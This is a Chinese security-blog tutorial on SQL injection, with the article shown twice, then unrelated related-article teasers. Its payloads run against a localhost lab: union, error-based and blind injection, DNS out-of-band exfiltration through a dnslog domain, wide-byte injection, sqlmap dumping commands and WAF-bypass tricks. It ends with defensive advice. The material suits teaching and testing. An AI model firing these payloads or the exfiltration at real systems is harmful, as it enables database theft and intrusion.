2026-01-07 Web安全 SQL注入 sqlmap WAF绕过 盲注 DNS外带一、SQL注入概述SQL注入SQL Injection是一种常见的Web安全漏洞攻击者通过在应用程序的输入字段中插入恶意SQL语句从而对数据库进行非法操作。SQL注入的危害包括数据泄露读取数据库中的敏感信息用户账号、密码、个人信息等数据篡改修改、删除数据库中的数据权限提升获取数据库管理员权限系统控制通过数据库功能执行操作系统命令二、SQL注入分类2.1 联合查询注入Union Based利用UNION操作符将攻击者的SQL语句与原始查询合并从而获取额外数据。测试环境http://localhost/bbs/showmessage.php?id1 http://localhost/bbs/showmessage.php?id2判断注入点http://localhost/bbs/showmessage.php?id1 and 11 -- 正常 http://localhost/bbs/showmessage.php?id1 and 12 -- 异常判断列数http://localhost/bbs/showmessage.php?id1 order by 1 -- 正常 http://localhost/bbs/showmessage.php?id1 order by 2 -- 正常 http://localhost/bbs/showmessage.php?id1 order by N -- 直到报错联合查询获取数据http://localhost/bbs/showmessage.php?id-1 union select 1,2,3,... http://localhost/bbs/showmessage.php?id-1 union select 1,version(),database() http://localhost/bbs/showmessage.php?id-1 union select 1,table_name,3 from information_schema.tables where table_schemadatabase()2.2 报错注入Error Based利用数据库报错信息来获取数据常用的报错函数包括-- updatexml报错注入 http://localhost/bbs/showmessage.php?id1 and updatexml(1,concat(0x7e,(select user()),0x7e),1) -- extractvalue报错注入 http://localhost/bbs/showmessage.php?id1 and extractvalue(1,concat(0x7e,(select database()),0x7e)) -- floor报错注入 http://localhost/bbs/showmessage.php?id1 and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a)2.3 布尔盲注Boolean Based Blind当页面不显示查询结果和报错信息但会根据SQL语句的真假返回不同页面时使用布尔盲注。-- 判断数据库名长度 http://localhost/bbs/showmessage.php?id1 and length(database())5 -- 逐字符猜解数据库名 http://localhost/bbs/showmessage.php?id1 and substr(database(),1,1)a http://localhost/bbs/showmessage.php?id1 and ascii(substr(database(),1,1))97 -- 使用ord函数 http://localhost/bbs/showmessage.php?id1 and ord(mid(database(),1,1))972.4 时间盲注Time Based Blind当页面没有任何回显和报错时通过时间延迟来判断SQL语句的真假。-- 基于sleep的延迟 http://localhost/bbs/showmessage.php?id1 and if(11,sleep(5),0) http://localhost/bbs/showmessage.php?id1 and if(length(database())5,sleep(5),0) -- 基于benchmark的延迟 http://localhost/bbs/showmessage.php?id1 and if(11,benchmark(10000000,sha1(test)),0)三、DNS外带数据当无法直接获取数据时可以通过DNS查询将数据外带到攻击者控制的服务器。使用dnslog.cnhttp://dnslog.cn/DNS外带注入payload-- MySQL DNS外带 http://localhost/bbs/showmessage.php?id1 and load_file(concat(\\\\,database(),.dnslog域名\\abc)) -- 使用sqlmap的DNS外带 sqlmap -u http://localhost/bbs/showmessage.php?id1 --dns-domaindnslog域名四、宽字节注入当应用程序使用GBK/GB2312等宽字节编码时可以利用宽字节特性绕过转义。-- 正常情况单引号被转义 http://localhost/bbs/test.php?id1\ -- 被转义为 1\ -- 宽字节注入%df与\合并为一个宽字节字符 http://localhost/bbs/test.php?id1%df\ -- %df%5c组成一个GBK字符单引号逃逸五、sqlmap工具使用sqlmap是一款自动化的SQL注入检测与利用工具官方地址https://sqlmap.org/5.1 基本用法# 检测注入点 sqlmap -u http://localhost/bbs/showmessage.php?id1 # 获取数据库 sqlmap -u http://localhost/bbs/showmessage.php?id1 --dbs # 获取表 sqlmap -u http://localhost/bbs/showmessage.php?id1 -D 数据库名 --tables # 获取列 sqlmap -u http://localhost/bbs/showmessage.php?id1 -D 数据库名 -T 表名 --columns # 获取数据 sqlmap -u http://localhost/bbs/showmessage.php?id1 -D 数据库名 -T 表名 -C 列名 --dump5.2 常用参数-u URL # 指定目标URL --dataDATA # POST数据 --cookieCOOKIE # 设置Cookie --levelLEVEL # 检测级别(1-5) --riskRISK # 风险级别(1-3) --techniqueTECH # 指定注入技术(B/E/U/S/T/Q) --tamperTAMPER # 使用绕过脚本 --batch # 不询问使用默认选项 --random-agent # 使用随机User-Agent --proxyPROXY # 使用代理 --dns-domainDOMAIN # DNS外带域名5.3 POST注入sqlmap -u http://localhost/bbs/member/register.php --datausernameadminpassword1234565.4 Cookie注入sqlmap -u http://localhost/bbs/index.php --cookiesessionabc123六、WAF绕过6.1 大小写绕过http://localhost/bbs/showmessage.php?id1 UnIoN SeLeCt 1,2,36.2 双写绕过http://localhost/bbs/showmessage.php?id1 ununionion selselectect 1,2,36.3 编码绕过-- URL编码 http://localhost/bbs/showmessage.php?id1 %55nion %53elect 1,2,3 -- 十六进制编码 http://localhost/bbs/showmessage.php?id1 union select 1,hex(database()),3 -- Unicode编码 http://localhost/bbs/showmessage.php?id1 uni%6fn sel%65ct 1,2,36.4 注释绕过-- 内联注释 http://localhost/bbs/showmessage.php?id1 /*!union*/ /*!select*/ 1,2,3 -- MySQL版本注释 http://localhost/bbs/showmessage.php?id1 /*!50000union*/ /*!50000select*/ 1,2,36.5 空格绕过-- 使用注释替代空格 http://localhost/bbs/showmessage.php?id1/**/union/**/select/**/1,2,3 -- 使用%09 %0a %0b %0c %0d替代空格 http://localhost/bbs/showmessage.php?id1%09union%09select%091,2,36.6 使用sqlmap的tamper脚本# 查看所有tamper脚本 sqlmap --list-tampers # 常用tamper脚本 sqlmap -u URL --tamperspace2comment # 空格转注释 sqlmap -u URL --tamperbetween # 用between替代大于号 sqlmap -u URL --tamperrandomcase # 随机大小写 sqlmap -u URL --tampercharencode # URL编码 sqlmap -u URL --tamperspace2comment,between # 组合使用七、实战环境本文使用的测试环境目标BBS系统http://localhost/bbs/测试页面http://localhost/bbs/showmessage.php?id1http://localhost/bbs/showmessage.php?id2http://localhost/bbs/test.phphttp://localhost/bbs/member/register.phphttp://localhost/bbs/member/cgpwd.phphttp://localhost/bbs/index.phpDNS外带工具http://dnslog.cn/SQL注入工具sqlmap八、防御建议使用参数化查询预编译语句从根本上防止SQL注入对用户输入进行严格校验和过滤使用ORM框架减少手写SQL的场景最小权限原则数据库用户只授予必要权限部署WAF作为额外的安全防护层关闭数据库报错信息显示避免信息泄露定期进行安全审计和漏洞扫描© 2026 安全攻防笔记 - 仅供安全研究与学习使用
SQL注入漏洞进阶篇
发布时间:2026/5/25 1:17:28
2026-01-07 Web安全 SQL注入 sqlmap WAF绕过 盲注 DNS外带一、SQL注入概述SQL注入SQL Injection是一种常见的Web安全漏洞攻击者通过在应用程序的输入字段中插入恶意SQL语句从而对数据库进行非法操作。SQL注入的危害包括数据泄露读取数据库中的敏感信息用户账号、密码、个人信息等数据篡改修改、删除数据库中的数据权限提升获取数据库管理员权限系统控制通过数据库功能执行操作系统命令二、SQL注入分类2.1 联合查询注入Union Based利用UNION操作符将攻击者的SQL语句与原始查询合并从而获取额外数据。测试环境http://localhost/bbs/showmessage.php?id1 http://localhost/bbs/showmessage.php?id2判断注入点http://localhost/bbs/showmessage.php?id1 and 11 -- 正常 http://localhost/bbs/showmessage.php?id1 and 12 -- 异常判断列数http://localhost/bbs/showmessage.php?id1 order by 1 -- 正常 http://localhost/bbs/showmessage.php?id1 order by 2 -- 正常 http://localhost/bbs/showmessage.php?id1 order by N -- 直到报错联合查询获取数据http://localhost/bbs/showmessage.php?id-1 union select 1,2,3,... http://localhost/bbs/showmessage.php?id-1 union select 1,version(),database() http://localhost/bbs/showmessage.php?id-1 union select 1,table_name,3 from information_schema.tables where table_schemadatabase()2.2 报错注入Error Based利用数据库报错信息来获取数据常用的报错函数包括-- updatexml报错注入 http://localhost/bbs/showmessage.php?id1 and updatexml(1,concat(0x7e,(select user()),0x7e),1) -- extractvalue报错注入 http://localhost/bbs/showmessage.php?id1 and extractvalue(1,concat(0x7e,(select database()),0x7e)) -- floor报错注入 http://localhost/bbs/showmessage.php?id1 and (select 1 from (select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a)2.3 布尔盲注Boolean Based Blind当页面不显示查询结果和报错信息但会根据SQL语句的真假返回不同页面时使用布尔盲注。-- 判断数据库名长度 http://localhost/bbs/showmessage.php?id1 and length(database())5 -- 逐字符猜解数据库名 http://localhost/bbs/showmessage.php?id1 and substr(database(),1,1)a http://localhost/bbs/showmessage.php?id1 and ascii(substr(database(),1,1))97 -- 使用ord函数 http://localhost/bbs/showmessage.php?id1 and ord(mid(database(),1,1))972.4 时间盲注Time Based Blind当页面没有任何回显和报错时通过时间延迟来判断SQL语句的真假。-- 基于sleep的延迟 http://localhost/bbs/showmessage.php?id1 and if(11,sleep(5),0) http://localhost/bbs/showmessage.php?id1 and if(length(database())5,sleep(5),0) -- 基于benchmark的延迟 http://localhost/bbs/showmessage.php?id1 and if(11,benchmark(10000000,sha1(test)),0)三、DNS外带数据当无法直接获取数据时可以通过DNS查询将数据外带到攻击者控制的服务器。使用dnslog.cnhttp://dnslog.cn/DNS外带注入payload-- MySQL DNS外带 http://localhost/bbs/showmessage.php?id1 and load_file(concat(\\\\,database(),.dnslog域名\\abc)) -- 使用sqlmap的DNS外带 sqlmap -u http://localhost/bbs/showmessage.php?id1 --dns-domaindnslog域名四、宽字节注入当应用程序使用GBK/GB2312等宽字节编码时可以利用宽字节特性绕过转义。-- 正常情况单引号被转义 http://localhost/bbs/test.php?id1\ -- 被转义为 1\ -- 宽字节注入%df与\合并为一个宽字节字符 http://localhost/bbs/test.php?id1%df\ -- %df%5c组成一个GBK字符单引号逃逸五、sqlmap工具使用sqlmap是一款自动化的SQL注入检测与利用工具官方地址https://sqlmap.org/5.1 基本用法# 检测注入点 sqlmap -u http://localhost/bbs/showmessage.php?id1 # 获取数据库 sqlmap -u http://localhost/bbs/showmessage.php?id1 --dbs # 获取表 sqlmap -u http://localhost/bbs/showmessage.php?id1 -D 数据库名 --tables # 获取列 sqlmap -u http://localhost/bbs/showmessage.php?id1 -D 数据库名 -T 表名 --columns # 获取数据 sqlmap -u http://localhost/bbs/showmessage.php?id1 -D 数据库名 -T 表名 -C 列名 --dump5.2 常用参数-u URL # 指定目标URL --dataDATA # POST数据 --cookieCOOKIE # 设置Cookie --levelLEVEL # 检测级别(1-5) --riskRISK # 风险级别(1-3) --techniqueTECH # 指定注入技术(B/E/U/S/T/Q) --tamperTAMPER # 使用绕过脚本 --batch # 不询问使用默认选项 --random-agent # 使用随机User-Agent --proxyPROXY # 使用代理 --dns-domainDOMAIN # DNS外带域名5.3 POST注入sqlmap -u http://localhost/bbs/member/register.php --datausernameadminpassword1234565.4 Cookie注入sqlmap -u http://localhost/bbs/index.php --cookiesessionabc123六、WAF绕过6.1 大小写绕过http://localhost/bbs/showmessage.php?id1 UnIoN SeLeCt 1,2,36.2 双写绕过http://localhost/bbs/showmessage.php?id1 ununionion selselectect 1,2,36.3 编码绕过-- URL编码 http://localhost/bbs/showmessage.php?id1 %55nion %53elect 1,2,3 -- 十六进制编码 http://localhost/bbs/showmessage.php?id1 union select 1,hex(database()),3 -- Unicode编码 http://localhost/bbs/showmessage.php?id1 uni%6fn sel%65ct 1,2,36.4 注释绕过-- 内联注释 http://localhost/bbs/showmessage.php?id1 /*!union*/ /*!select*/ 1,2,3 -- MySQL版本注释 http://localhost/bbs/showmessage.php?id1 /*!50000union*/ /*!50000select*/ 1,2,36.5 空格绕过-- 使用注释替代空格 http://localhost/bbs/showmessage.php?id1/**/union/**/select/**/1,2,3 -- 使用%09 %0a %0b %0c %0d替代空格 http://localhost/bbs/showmessage.php?id1%09union%09select%091,2,36.6 使用sqlmap的tamper脚本# 查看所有tamper脚本 sqlmap --list-tampers # 常用tamper脚本 sqlmap -u URL --tamperspace2comment # 空格转注释 sqlmap -u URL --tamperbetween # 用between替代大于号 sqlmap -u URL --tamperrandomcase # 随机大小写 sqlmap -u URL --tampercharencode # URL编码 sqlmap -u URL --tamperspace2comment,between # 组合使用七、实战环境本文使用的测试环境目标BBS系统http://localhost/bbs/测试页面http://localhost/bbs/showmessage.php?id1http://localhost/bbs/showmessage.php?id2http://localhost/bbs/test.phphttp://localhost/bbs/member/register.phphttp://localhost/bbs/member/cgpwd.phphttp://localhost/bbs/index.phpDNS外带工具http://dnslog.cn/SQL注入工具sqlmap八、防御建议使用参数化查询预编译语句从根本上防止SQL注入对用户输入进行严格校验和过滤使用ORM框架减少手写SQL的场景最小权限原则数据库用户只授予必要权限部署WAF作为额外的安全防护层关闭数据库报错信息显示避免信息泄露定期进行安全审计和漏洞扫描© 2026 安全攻防笔记 - 仅供安全研究与学习使用
相关文章
8051 XDATA分页配置与内存管理实战
1. C51开发中的XDATA分页配置实战在8051架构的嵌入式开发中,内存管理一直是个令人头疼的问题。传统8051芯片仅有256字节的片内RAM,对于现代应用来说远远不够。虽然许多增强型8051芯片扩展了外部RAM(XDATA),但当我们需要…
机器学习周报四十六
文章目录 摘要Abstract1 语义监督2 场景文本编辑 总结 摘要 本周主要工作是对上周提出的想法进行实验,希冀找到一个真正有效的视觉监督,实现多语言的泛化。但是实验的效果比较差,对失败的原因和做法进行了分析。 Abstract The main work t…
FPGA加速机器学习在地球观测中的应用与优化
1. FPGA加速机器学习在地球观测中的核心价值FPGA(现场可编程门阵列)正在重塑地球观测领域的数据处理范式。与传统CPU/GPU方案相比,FPGA凭借其可重构特性,能够为特定算法定制数据流架构,实现指令级并行(ILP&…
戴森球计划FactoryBluePrints:构建星际工厂的终极蓝图库
戴森球计划FactoryBluePrints:构建星际工厂的终极蓝图库 【免费下载链接】FactoryBluePrints 游戏戴森球计划的**工厂**蓝图仓库 项目地址: https://gitcode.com/GitHub_Trending/fa/FactoryBluePrints 在戴森球计划这款宇宙工厂建造游戏中,Facto…
如何快速建立高效能源工厂:戴森球计划蓝图仓库完整指南
如何快速建立高效能源工厂:戴森球计划蓝图仓库完整指南 【免费下载链接】FactoryBluePrints 游戏戴森球计划的**工厂**蓝图仓库 项目地址: https://gitcode.com/GitHub_Trending/fa/FactoryBluePrints FactoryBluePrints蓝图仓库为戴森球计划玩家提供了完整的…
从零到一:用Python+微分方程模拟传染病传播(以SIR模型为例)
从零到一:用Python微分方程模拟传染病传播(以SIR模型为例)在公共卫生领域,传染病传播模型一直是预测疫情发展趋势的重要工具。SIR模型作为经典的传染病动力学模型,通过微分方程组描述了易感者(S)、感染者(I)和康复者(R…
Redux Dynamic Modules最佳实践:避免常见错误的10个技巧
Redux Dynamic Modules最佳实践:避免常见错误的10个技巧 【免费下载链接】redux-dynamic-modules Modularize Redux by dynamically loading reducers and middlewares. 项目地址: https://gitcode.com/gh_mirrors/re/redux-dynamic-modules Redux Dynamic M…
ChatGPT企业版API集成实战(附17个生产环境避坑清单)
更多请点击: https://kaifayun.com 第一章:ChatGPT企业版的核心定位与价值演进 ChatGPT企业版并非简单叠加安全补丁的“增强版”,而是面向规模化商业场景重构的AI基础设施。其核心定位是成为企业级可信AI中枢——在保障数据主权、合规可控与…
告别简历制作烦恼:3步用Markdown打造专业求职材料的创新方案
告别简历制作烦恼:3步用Markdown打造专业求职材料的创新方案 【免费下载链接】pandoc_resume The Markdown Resume 项目地址: https://gitcode.com/gh_mirrors/pa/pandoc_resume 还在为每次求职都要重新设计简历而烦恼吗?🤔 传统的Wor…
Go语言SQLite轻量级数据库应用
Go语言SQLite轻量级数据库应用 引言 SQLite是一款轻量级的嵌入式数据库,无需独立服务进程,非常适合单机应用、移动端应用和开发测试环境。Go语言通过database/sql包配合go-sqlite3驱动可以方便地操作SQLite数据库。本文将深入探讨Go语言中SQLite的使用技…
【前端无障碍】屏幕阅读器兼容性:确保视障用户的良好体验
【前端无障碍】屏幕阅读器兼容性:确保视障用户的良好体验 前言 大家好,我是cannonmonster01!今天咱们来聊聊屏幕阅读器兼容性这个话题。想象一下,一个视障用户打开你的网站,通过屏幕阅读器来浏览内容。如果你的网站没有…
2026年横评10款降AI率软件:只选真正管用的那一款!
随着AI写作工具的广泛应用,论文写作和内容创作效率得到了显著提升,许多学生和职场人士都开始依赖这些工具来完成繁重的文字任务。然而,随着各大高校、期刊平台对AIGC内容检测技术的不断升级,AI生成内容的痕迹越来越容易被识别。不…
施工现场安全事故预警准确率达94.6%?——解密某央企AI Agent边缘计算部署架构与3个月落地实录
更多请点击: https://codechina.net 第一章:施工现场安全事故预警准确率达94.6%?——解密某央企AI Agent边缘计算部署架构与3个月落地实录 在华北某大型地铁盾构施工现场,一套轻量化AI Agent系统于2024年Q2完成全栈部署ÿ…
附录 B:术语表
本术语表面向“从 MM 到 HMM”专栏阅读过程中的快速查阅。它不是内核 API 手册,而是把文章中反复出现的概念放到同一张地图上:先给出直观含义,再说明它在 Linux MM/HMM 语境里的作用。建议阅读方式: 初读专栏时,把它当…
Midjourney渐变美学的神经渲染原理(附RGB-HSV-LCH三空间渐变映射对照表·行业首曝)
更多请点击: https://kaifayun.com 第一章:Midjourney渐变美学的神经渲染原理(附RGB-HSV-LCH三空间渐变映射对照表行业首曝) Midjourney 的渐变美学并非传统插值实现,而是由其隐式神经渲染器(Implicit Neu…
MPC-BE:基于DirectShow架构的专业级开源媒体播放解决方案
MPC-BE:基于DirectShow架构的专业级开源媒体播放解决方案 【免费下载链接】MPC-BE MPC-BE – универсальный проигрыватель аудио и видеофайлов для операционной системы Windows. 项目地址:…
如何快速计算3D模型体积和重量:STL-Volume-Model-Calculator终极指南
如何快速计算3D模型体积和重量:STL-Volume-Model-Calculator终极指南 【免费下载链接】STL-Volume-Model-Calculator STL Volume Model Calculator Python 项目地址: https://gitcode.com/gh_mirrors/st/STL-Volume-Model-Calculator 你是否曾经为3D打印项目…
通过Taotoken CLI工具一键配置团队开发环境与模型密钥
通过Taotoken CLI工具一键配置团队开发环境与模型密钥 1. CLI工具安装与基本使用 Taotoken提供的CLI工具可通过npm全局安装或直接使用npx运行。对于需要频繁使用CLI的团队,推荐全局安装: npm install -g taotoken/taotoken对于临时使用或项目级配置&a…